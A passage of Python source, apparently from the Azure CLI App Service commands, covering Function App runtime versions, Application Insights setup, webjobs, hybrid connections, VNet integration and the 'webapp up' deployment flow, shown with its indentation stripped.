matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
subnet_resource_id = _validate_subnet(cmd.cli_ctx, subnet, vnet, resource_group_name)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnet_id_parts = parse_resource_id(subnet_resource_id)
vnet_name = subnet_id_parts['name']
vnet_resource_group = subnet_id_parts['resource_group']
subnet_name = subnet_id_parts['child_name_1']
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation.".format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
except Exception as ex:
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception:
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
# may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
settings.append('%s=%s', k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, kind="app", properties=app_metadata.properties)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
